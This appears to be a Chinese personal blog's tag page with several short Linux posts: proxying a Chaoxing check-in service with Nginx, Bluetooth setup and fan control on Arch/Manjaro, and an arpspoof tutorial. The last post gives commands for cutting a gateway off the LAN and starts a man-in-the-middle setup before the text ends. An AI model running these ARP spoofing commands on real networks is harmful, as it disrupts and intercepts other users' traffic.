Nginx 部署超星学习通签到服务
在 AWS 的 EC2 服务器上部署了这玩意,一方面分散华为云那个服务器的压力,一方面体验一下部署在服务器的流程。之前一直都是静态网页部署+云函数,比较省事。
用的 PM2 运行的接口服务,端口号是 5000
,可以直接通过域名+端口号访问接口,但是感觉这样不太优雅,干脆用 Nginx 代理一下。让网站可以通过 /chaoxing
路径访问,让接口可以通过 /chaoxing-api
来访问。
Linux
查看所有标签在 AWS 的 EC2 服务器上部署了这玩意,一方面分散华为云那个服务器的压力,一方面体验一下部署在服务器的流程。之前一直都是静态网页部署+云函数,比较省事。
用的 PM2 运行的接口服务,端口号是 5000
,可以直接通过域名+端口号访问接口,但是感觉这样不太优雅,干脆用 Nginx 代理一下。让网站可以通过 /chaoxing
路径访问,让接口可以通过 /chaoxing-api
来访问。
在 ArchLinux 中如何使用蓝牙耳机如何连接到电脑看视频、听歌。
命令:
yay -S bluez bluez-utils # 安装bluez和bluez-utils
lsmod | grep btusb #检查模块是否加载
modprobe btusb #加载模块
systemctl enable bluetooth #开机自启动蓝牙服务
通常这样就可以了,但是如果连不上去,尝试安装 pulseaudio-bluetooth,完成后重启,即可连上。
这个问题真是困扰了多年,始终没解决。在使用 Manjaro、ChromeOS、Ubuntu 等系统时,都因为风扇转速太疯狂而回到 Windows。一直也没找到合适的解决方法,起初以为是双显卡的问题,以为是 Nvidia 显卡驱动没装好或者是一直在使用独显,今天终于知道是风扇控制策略的问题。每一个温度区间对应一个适合的风扇转速,而这些转速在 Linux 中默认设置的不太合适。
安装 nbfc-linux
,这是一个参考 nbfc
并改用C语言写的风扇管理程序。
What | NBFC Mono | NBFC Linux |
---|---|---|
Portability | Crossplatform | Linux |
Configuration files | XML (956KB) | JSON (840KB) |
Runtime | Mono | Native |
Memory consumption (ps_mem) | ~50MB | ~350KB |
Package size (pkg.tar.gz) | 448K | 100K |
Service control rights | Any user | Only root |
IPC Concept | TCP/IP | Files |
IPC Protocol | Binary | JSON |
安装该程序,然后可在 /usr/share/nbfc/configs/ 目录下,找到所有提供的配置文件。
yay -S nbfc-linux
选择一个最符合我笔记本的型号,我的电脑是AN515-54,在同类型笔记本中发现,AN715-51和我的配置相同。可以将 Acer Nitro AN715-51.json
作为我的配置。
在终端中运行以下命令:
# 设置该型号为当前配置
sudo nbfc config --set "Acer Nitro AN715-51"
# 启动风扇管理
sudo nbfc start
# 开机自动运行风扇管理服务
sudo systemctl enable nbfc_service
当启动风扇管理后,可以明显听到风扇的变化,问题解决。
本篇内容仅用于学习和测试,本人遵纪守法。
arpspoof 是 dsniff 包里的一个程序,可用于arp攻击。Manjaro 中执行以下命令安装这个软件包就可以使用了。
yay -S dsniff
arpspoof - 截获交换局域网中的数据包。
用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
描述
arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。
内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。
1. 断网攻击,不开启流量转发,使用我的无线网卡 wlp8s0
,攻击网关
sudo arpspoof -i wlp8s0 -t 192.168.1.1
2. 中间人攻击,截获用户和网关之间的流量
开启流量转发
echo 1 >> /proc/sys/net/ipv4/ip_forward